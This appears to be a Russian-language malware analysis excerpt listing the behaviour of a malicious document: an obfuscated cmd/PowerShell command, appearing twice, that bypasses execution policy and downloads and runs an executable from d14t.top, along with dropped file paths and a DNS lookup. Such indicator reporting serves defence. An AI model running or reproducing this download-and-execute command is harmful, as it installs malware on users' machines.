Техническая информация
- http://d14t.top/brig/ как $uytcccs
- '<SYSTEM32>\cmd.exe' /c P^owerSh^ell -ExecutionPolicy ByPass -NoProfile -command $uytcccs=$env:temp+'\3bs2.exe';(Ne^w-Objec^t Net.We^bCli^e^nt).DownloadFile('http://d14t.top/brig/',$uytcccs);Start-Process $uytcccs
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\1213906.cvr
- DNS ASK d1##.top
- '<SYSTEM32>\cmd.exe' /c P^owerSh^ell -ExecutionPolicy ByPass -NoProfile -command $uytcccs=$env:temp+'\3bs2.exe';(Ne^w-Objec^t Net.We^bCli^e^nt).DownloadFile('http://d14t.top/brig/',$uytcccs);Start-Process $uytcccs' (со скрытым окном)